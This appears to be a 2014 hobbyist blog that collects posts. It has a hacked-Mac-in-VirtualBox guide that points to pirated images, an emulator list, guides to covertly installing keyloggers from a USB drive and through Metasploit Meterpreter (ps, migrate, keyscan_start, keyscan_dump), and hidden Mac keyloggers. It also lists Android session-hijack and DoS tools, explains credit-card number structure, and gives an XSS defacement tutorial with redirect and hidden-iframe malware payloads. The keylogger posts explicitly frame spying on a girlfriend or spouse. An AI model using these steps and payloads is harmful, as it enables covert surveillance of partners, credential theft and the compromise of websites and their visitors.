Wednesday, 23 April 2014

How to Run Mac OS X montain lion Inside Windows Using VirtualBox 4.3 for enjoying everything right on your pc

Even if you're a Windows fan, you've probably thought about trying OS X. Maybe you'd like to test drive OS X before switching to a Mac or building a Hackintosh, or maybe you just want to run that one killer OS X app on your Windows machine. Whatever your reason, you can actually install and run OS X on any Intel-based Windows PC with a program called VirtualBox. Here's how.

Running OS X on your Windows desktop will take a bit of work, but it's pretty easy to do and the final product is awesome. To see what the whole setup will look like when you're done, check out the video above. Then, head to the instructions below to set it up for yourself. Thanks to MacBreaker for figuring out a lot of the original instructions!

What You'll Need

Before you start the installation process, you'll want to gather the following:
  • A PC running 64-bit Windows with at least a dual-core processor and 4GB of RAM. Mountain Lion is 64-bit, and thus requires your copy of Windows to be 64-bit. If you're on a 32-bit version of Windows, you can install Snow Leopard instead. For more info, check out the difference between 32-bit and 64-bit operating systems. Note that your processor also needs to support VT-x. This list should help you find out whether yours does.
  • VirtualBox and the VirtualBox Extension Pack: VirtualBox is our favorite virtualization tool for Windows, and it's completely free. VirtualBox doesn't officially support OS X, but it's actually very easy to get up and running. You should download the main program and the Extension Pack, which will give you support for USB devices.
  • A hacked Mountain Lion disc image. Sadly, this won't work with a vanilla Mountain Lion installer, so you'll have to find a compatible hacked version. The hacking group Olarila has put a great installation ISO together, and you can find it by searching Google. If that doesn't sit well with you, you can head over to the Mac App Store and buy a legit copy for yourself, so you can at least pirate with a clear conscience.
  • The HackBoot 1 and HackBoot 2 ISO files. These will help you boot into the installation.
  • MultiBeast 4, which will help you get audio and other things working correctly after installation. You'll need to register for a free account over at to download this. Make sure to download MultiBeast 4—it's labeled "Lion", but for our purposes the Lion version works better than the Mountain Lion version.

Step One: Install and Set Up VirtualBox

Before we install OS X, we'll need to set up VirtualBox so the OS X install disc can boot correctly. Here's what you need to do:
  1. Start up VirtualBox and click the New button. Give your new virtual machine a name (I just called it "Mac OS X") and set the operating system to "Mac OS X Server (64-bit)".How to Run Mac OS X Inside Windows Using VirtualBox
  2. Click Next and choose how much RAM to give your virtual machine. This depends on how much RAM is in your system—you can get away with 2GB, but if you have more, give it more. 4GB of RAM should be a good amount, though I gave mine 6GB since I had RAM to spare.How to Run Mac OS X Inside Windows Using VirtualBox
  3. Click Next again, and choose "Create New Disk". Create your new disk in VDI format and with dynamically allocated storage. When you're done, VirtualBox should take you back to the main screen.
  4. From here, right-click on your OS X machine in the left sidebar and click Settings. Go to the "System" section and uncheck "Enable EFI".
  5. Click on the Storage section of the settings and click on the CD icon that says "Empty" under Storage Type. Then, click the CD icon next to the "CD/DVD Drive" dropdown, and select "Choose a Virtual CD/DVD Disk File". Choose the HackBoot 1 ISO and click OK.How to Run Mac OS X Inside Windows Using VirtualBox
Now, your machine is ready to boot for the first time. Make sure you have your Mountain Lion ISO ready to go and proceed to the next step.

Step Two: Install OS X in VirtualBox

The next step involves actually installing OS X to your new virtual machine. When you're ready, start up VirtualBox and follow these instructions:
  1. Select your OS X machine in VirtualBox's left sidebar and click the Start button in the toolbar. It'll bring you to the HackBoot boot screen, with one icon in the middle labeled HackBoot.How to Run Mac OS X Inside Windows Using VirtualBox
  2. Click on the CD icon at the bottom of the VirtualBox window and select "Choose a Virtual CD/DVD Disk File". This time, choose your hacked Mountain Lion ISO.
  3. Go back to the HackBoot boot screen and press F5. It should reload the boot menu, this time showing you an "OS X Install DVD". Select this option and press Enter. After a moment, it'll take you to the OS X Installation screen.
  4. After you choose your language and agree to the terms and conditions, you'll see that OS X doesn't detect any valid hard drives. To fix this problem, head up to the menu bar and go to Utilities > Disk Utility.
  5. Click on your VirtualBox hard drive in the left sidebar, then click the Erase tab in Disk Utility's main pane. Give your drive a name (like "Macintosh HD") and click "Erase".How to Run Mac OS X Inside Windows Using VirtualBox
  6. Once Disk Utility has finished formatting your drive, you should see it show up in the left sidebar. When you do, exit Disk Utility and continue with the OS X installation as normal.
The rest of the installation should be pretty self-explanatory, and should go off without a hitch. It took me about 20 minutes to install OS X. When it finishes, it'll take you to a black screen with white text. At this point, you can click the "X" in the upper-right corner of the window to power off the virtual machine.

Step Three: Smooth Out the Rough Edges

You're almost there! You've installed OS X, but you'll still need to tweak a few things to get audio and graphics working properly. Here's what you need to do.

Fix Audio with MultiBeast

  1. Open up VirtualBox and right-click on your OS X virtual machine in the left sidebar. Head back to its Settings and go to the Storage section. Once again, click on the disc icon on the right side of the window, this time choosing the HackBoot 2 ISO.
  2. Click the Start button to reboot your virtual machine. You should see the HackBoot menu again, this time with an option to boot into your new virtual machine. Select that option and press Enter.How to Run Mac OS X Inside Windows Using VirtualBox
  3. After a minute, you should see the Mountain Lion desktop with the familiar galaxy wallpaper. Open up Safari, head to, and download MultiBeast as described in the "What You'll Need" section.
  4. Open up System Preferences > Security. Click the lock in the bottom left-hand corner, enter your password, and set the "Allow Applications" preference to "Anywhere". This will let you run apps from untrusted developers, which includes Multibeast.
  5. Launch Multibeast. When you get to the Installation Type section, Choose the options pictured below:How to Run Mac OS X Inside Windows Using VirtualBoxClick continue and finish the Multibeast installation. It may take a few minutes.
Your audio won't work just yet, but we have a few other things we need to do before we restart.

Boot OS X Without HackBoot

In order to boot OS X without the HackBoot CD, we'll need to delete a problematic kext. You can do this through the following steps:
  1. Open up the Finder and select Go > Go to Folder from the menu bar. Type in /System/Library/Extensions and press Enter.
  2. In this folder, find the AppleGraphicsControl.kext file and delete it. This will allow your virtual machine to boot up without the HackBoot ISO.How to Run Mac OS X Inside Windows Using VirtualBox
  3. Click on the disc icon at the bottom of VirtualBox's window and uncheck the HackBoot 2 ISO, since you won't need it anymore.

Get Higher Resolution Virtual Machine

Lastly, you've probably noticed your VM is running at a pretty low resolution. That's totally lame, so we're going to make it run at the same resolution as our monitor with a few tweaks. To do so, just:
  1. Head back to Go > Go to Folder and go to /Extra/. Double-click on the org.Chameleon.boot.plist file and add the following to the bottom of the file, above the line:
    Graphics Mode
    Save the file and close TextEdit. This allows OS X to start up with a higher resolution. Note that you can set whatever resolution you want; just replace 1920x1080 with the resolution you want.
  2. If the resolution you picked is bigger than 1280x1024 and/or is widescreen, you'll need to do one last thing to get it working properly. Shut down your virtual machine and open Windows' Command Prompt. Type the following commands, hitting enter after each one:
    cd "C:\Program Files\Oracle\VirtualBox"
    vboxmanage setextradata "MyVirtualMachine" "CustomVideoMode1" "1920x1080x32"
    Replace the first line with the path to your VirtualBox program folder. In the second line, replace MyVirtualMachine with the name of your machine (in our case, "Mac OS X"), and 1920x1080x32 with the same resolution you added to your Chameleon plist.
How to Run Mac OS X Inside Windows Using VirtualBoxExpand
When you're done, restart your OS X virtual machine and you should be greeted with a full-res desktop and working audio! You can now continue to install your favorite apps, set up your keyboard and mouse, and do anything else you like. You've got a fully working virtual Mac on your Windows desktop!

Monday, 7 April 2014

How to play all consoles games on your pc.

Many of you where trying to buy consoles yet fails to buys it at one point i.e: cheap/expensive, fake/real or with guarantee/ without guarantee. well why not try playing it in one console that is our all time favorite console PC.. ok first of let talk about how many console games we have played in our childhood..

1. sega games

2. nintendo/ nintendo wii/ nintendo wii u.
download nestopia(is it a nes emulator)

3. atrari

4. amiga pc

5. game boy

6. playstation 1/2/3/4
for play station 2 emulator click here

7. xbox/xbox 360/ xbox slim/ xbox one.

8. nvidia shield.(wait for nvidia shield tegra 4 emulator)

9. razor switchblade(wait for emulator)

10. ouya android games consoles.(wait or emulator)

11. psp (playstation portable) by sony.
 will post ps vita later..

why spend money buying all this while you can play this right at your own pc. using emulators and game using or without using DVD/flash. save games right into your computer...

Sunday, 6 April 2014

Deploying a Keylogger from a USB Flash Drive Quickly

This guide will explain how to configure a USB Flash Drive / Memory Stick so that you can run a keylogger within just a few seconds of plugging it in any computer.
It is important to note that in some countries, including the U.S., covertly intercepting electronic information is against the law. This guide is therefore intended to instruct you on how to use a keylogger on your own computer.

Step 1: You Will Need...

For this guide you will need a few things first:
  • A cheap memory stick / USB flash drive (any capacity)
  • Shadow Keylogger (free) which you can download free from here
  • The computer you want to record (i.e, your own)

Step 2: A Few More Things Before We Start...

You will also need to ensure that the computer you want to record:
  • Is running some version of Windows (this will not work on Mac or Linux)
  • Has the .NET Framework 2.0 or later (almost all do, but if not you can download free from here)

Step 3: Download Shadow Keylogger

We will need to set things up on the USB Flash Drive first, so on another computer, plug in your Flash Drive and open it through 'My Computer' or it may pop up a small window automatically. Leave this window open.
Now, download the keylogger from this link. This will download a .ZIP folder, which you will need to open. Inside the folder there will be a file called 'sk.exe', this is the keylogger program.
Click on the program and drag it across into your USB Flash Drive. Once it has been copied, you can close the .ZIP folder.

Step 4: Create an Automatic Setup File

Although the program will run fine at the moment, when you open Shadow Keylogger, you will have to create a password in order to start recording. However, this will take a little bit of time, which you may not have. So Shadow Keylogger has a clever feature where you can tell it to run automatically with a few pre-defined settings. For a full guide on how to create one of these files, you can watch our YouTube video.
In this guide, I will show you how you can configure it to start recording automatically. Open Notepad, or any other half-decent text editor, then copy this block of XML and paste it into your document:
<?xml version="1.0" encoding="UTF-8" ?>
I have highlighted the password bit above, since this is where you enter your own password. You will need to remember the password you chose, because after you have finished recording, you need to type it on the keyboard to see all of the recorded keystrokes.
For this guide, you don't need to change any of the other values.
Lastly, click 'Save As' and navigate to the USB Flash Drive and make sure it is in exactly the same folder as the program (sk.exe). Save the file as 'config.xml' (without the quotation marks) and make sure the dropdown menu is changed to 'All Files', and not 'Text files'. Then hit 'Save'!

Step 5: Now Try It!

You're done! Now, just pull the USB Flash Drive out of your computer. Approach the target computer, plug the USB Flash Drive in any available port.
On some computers, it may open the drive folder automatically, on others it may have a small prompt box, where you need to click on the 'Open Files and Folders' option. In a handful of cases, you may even need to open 'My Computer'.
When the drive folder opens, just double-click on the 'sk.exe', or click it and hit enter.
Shadow Keylogger will open immediately, realise you've already given it a password, and just start recording automatically.
You can then immediately pull out your USB Flash Drive from the computer. The folder will close automatically, and you can walk away.
Return later (for this particular setup, it has to be before the user shuts the computer down) and simply type your password onto the keyboard, it doesn't matter where.
The results window will then appear with all of the recorded keystrokes.

how to help girls fix their computer while she can give you access

Several of you have you have emailed me asking whether it's possible to install a keylogger on a victim’s computer using Metasploit. The answer is a resounding "YES"!
So, by popular request, in this guide I'll show you how to install a keylogger on your girlfriend's, boyfriend's, wife's, or husband's computer.
For those of you wondering what a keylogger is, the simple answer is that it's a piece of software or hardware that captures every keystroke and saves them for retrieval by you, the attacker. These types of devices have long been used by hackers to capture logins, passwords, social security numbers, etc. Here we will use it to capture the keystrokes of a cheating girlfriend.

Fire up Metasploit and let's get started.
Like in my last article on disabling antivirus software, I'm assuming that you've successfully installed Metasploit’s powerful listener/rootkit on the target system. You can also check my earlier Hack Like a Pro articles for a variety of ways to get it installed.

Step 1: Migrate the Meterpreter

Before we start our keylogger, we need to migrate the Meterpreter to the application or process we want to log the keystrokes from. Let's check to see what processes are running on the victim system by typing:
meterpreter >ps
Notice in the screenshot above that we have a listing of every process running on the victim system. We can see about 1/3 of the way down the process listing with a Process ID (PID) of 912, the Notepad application is open and running.
Let's migrate to that process and capture any keystrokes entered there. Type:
meterpreter > migrate 912
You can see from the screenshot that Meterpreter responds that we have migrated successfully,

Step 2: Start the Keylogger

Now that we have migrated the Meterpreter to the Notepad, we can embed the keylogger.
Metasploit’s Meterpreter has a built-in software keylogger called keyscan. To start it on the victim system, just type:
meterpreter> keyscan_start
With this command, Meterpreter will now start logging every keystroke entered into the Notepad application.

Step 3: Write a Short Note on the Victim System

Let's now move to our victim system and write a short note to make sure it works.
As you can see in screenshot above, Cheatah has written a short note to Stud, asking him to come visit while her boyfriend is gone. All of these keystrokes are being captured by our keylogger providing us with evidence of her cheating heart (or some other organ).

Step 4: Recover the Keystrokes

Now, let's go back to our system with Meterpreter running on Metasploit. We can now dump all of the keystrokes that were entered on Cheatah's computer. We simply type:
meterpreter> keyscan_dump

As you can see, every keystroke has been captured including the tabs and end of line characters. Now you have the evidence on Cheatah!

3 Steps to Collocate a Mac Keylogger

3 Steps to Collocate a Mac Keylogger and Grab User Activities You are probably finding a chance to check the user activities on your Mac. This could be the easiest way to keep users in line on your Mac. Here, we are instructing about a simple way for you to hit the mark: Grab all user activities on the Mac by collocating a Mac Keylogger. 

 STEP 1 There are many Free Mac keyloggers provided by CNET. Search a “Mac Free Keylogger” in CNET, you will get lots options. Click the Mac Keylogger download link and then you will get a Mac keylogger file. If you are using the latest Mac system, you may get trouble when installing the keylogger. Then you need to try to open the Mac keylogger file with some special ways. Options A.You need to hold on Control on the keyboard, at the same time, click on keylogger file, select "Open". Then the file will be opened. Options B.Change the system settings by going to Open System Preference – Universal Access – Check Enable access from assistive device – Next – Restart your device. Then you can open the Mac keylogger file by double clicks. 

STEP 2 After you finish step 1, you will find the keylogger is invisible. You are not able to open the Mac keylogger interface with an icon. The only way to bring out the keylogger is trying a hot key.. If you can bring up the Mac keylogger with hotkey, then the keylogger is installed successfully onto your Mac. 

STEP 3 Configure the keylogger to record keystrokes, passwords, chats, capture snapshots. What’s more, you can also set the keylogger to send reports with Email. When you go out or on a business trip, you can easily spy on your Mac and make sure there is no prohibitive behavior out there!

Download 5 Best Android networking Tools:

Today, I am gonna tell you about the top 5 android app for hacking or Download 5 Best Android Hacking Tools. Recently , i posted some posts about hacking must check out in Hacking section.As we all know hacking and pen testing is only can be done on computers. But now the world is changing now your mobile is small hacking toolkit using these apps. Must try all these apps. 

1. The Android Network Toolkit: In the last Defcon conference a new tool has been released by a security researcher and the tool is called “The Android network toolkit”. The has been developed for penetration tester and ethical hackers to test any network and vulnerabilitiesby using their mobile phones. This toolkit contain different apps that will help any hacker to find vulnerabilitiesand possibly exploit it. The company behind the app is an Israeli security firm called Zimperium. 

2. Nmap for Android: Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good. 

3. FaceNiff 2.4 final- Session Hijacker for Android: Your Facebook account is at risk, just like a Firesheep (for firefox hacking) there is a FaceNiff for hijacking the session of famous social networking websites includes facebook and twitter. FaceNiff is developed by Bartosz Ponurkiewicz who created Firesheep before but faceniff is for android OS. plz press esc when msg box pop up in download web site.

4. AnDOSid- DOS Tool for Android: DOS or denial of service attack is very dangerous attack because it takes down the server (computer).AnDOSid allows security professionals to simulate a DOS attack (A http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones.AnDOSid is designed for security professionals only! just send me ur email adress with your name if download won't work, i will mail you the file to download. and also any of this.

5. SSHDroid- Android Secure Shell: Secure shell or SSH is the best protocol that provides an extra layer of security while you are connecting with your remote machine.SSHDroid is a SSH server implementation for Android. This application will let you to connect to your device from a PC and execute commands (like "terminal" and "adb shell").

i m not responsible if damage cause by this software, use it only if you are professional in android.

How to find CC ( Credit Card Is Valid Or Not )

for educational PURPOSES ONLY. How to find CC ( Credit Card Is Valid Or Not ) This is all simply by knowing the 16 digits on the front of a card. The first digit of a card is called the Major Industry Identifier (MII). It designates the category of the entity which issued to card. This is useful in finding what exactly the card is for. 1 and 2 are Airlines, 3 is Travel and Entertainment 4 and 5 are Banking and Financial 6 is Merchandizing and Banking 7 is Petroleum 8 is Telecommunications 9 is a National assignment The first 6 digits are the Issuer Identification Number (IIN). It will identify the institution that issued the card. Visa: 4xxxxx Mastercard: 51xxxx – 55xxxx Discover: 6011xx, 644xxx, 65xxxx Amex: 34xxxx, 37xxxx Cards can be looked up by their IIN. A card that starts with 376211 is a Singapore Airlines Krisflyer American Express Gold Card. 529962 designates a pre-paid Much-Music MasterCard. The 7th and following digits, excluding the final digit, are the person’s account number. This leaves a trillion possible combinations. The final digit is the check digit or checksum. It is used to validate the credit card number using the Luhn algorithm How to use this information to validate a credit card with your brain: Take the below number (or any credit card number) 4417 1234 5678 9113 Now, double every other digit from the right (4×2, 1×2, 1×2, 3×2, 5×2, 7×2, 9×2, 1×2) Add these new digits to the undoubled ones (4, 7, 2, 4, 6, 8, 1, 3) All double digit numbers are added as a sum of their digits, so 14 becomes 1+4. 8+4+2+7+2+2+6+4+1+0+6+1+4+8+1+8+1+2+3 = 70 If the final sum is divisible by 10, then the credit card number is valid. If it’s not divisible by 10, the number is invalid or fake. In this case, 70 is divisible by 10, so the credit card number is indeed valid. This works with every credit card If you have any Credit / Debit Card U may Can check it out.

Tutorial How to deface website with Cross Site Scripting

 Today i am gonna teach you how to deface the sites which has the XSS vulnerability . IMP NOTE : : Never implement this technique. I am just explaining it for educational purpose only. Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website to Hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..! i have some easiest methods to deface the Xss vuln sites .. i will be teaching u one by one . 

1 - Script for changing the background Color of a website: <script>document.body.bgColor="red";</script> use this in your target website as http:// www.targetwebsit<script>document.body.bgColor="red";</script>

 2 - Script for chaning the background image of a website: <script>document.body.background=" http:// your_image.jpg/";</script> 

 3 - Defacement Page with Pastehtml: First of all upload some defacement page(html) to and get the link. When you find a XSS vulnerable site, then insert the script as : <script>window.location=" http:// m/ Your_Defacement_ link";</script> This script will redirect the page to your pastehtml defacement page. Note: You can deface only persistent XSS vulnerable sites. 

 4 - Defacing with iframe Injection What is an IFrame Injection? Using IFrame tag, The Attackers injects the malware contain website(links) using Cross site Scripting in popular websites. So if the usual visitors of that popular sites opens the website, it will redirect to malware contain website. Malware will be loaded to your computer, now you are infected . What an attacker can do with Iframe Injection? Using Iframe Injection, an attacker can inject advertisements inside any other websites, insert malware infected site links, redirect to malware infected sites and more. Iframe Injection Tutorial: 
1.First of all attacker will find the Vulnerable websites using google dorks. 
2. They test the vulnerability by inserting some iframe tag using the url.
 3. then insert the Malicious Iframe code inside the webpage. For Example: he can insert this code using the url: Code: <iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe> For php webpages: echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

 I have just given some easy method only to deface the XSS affected page .. It wil be NOOB friendly .. Still there are more methods to deface it..: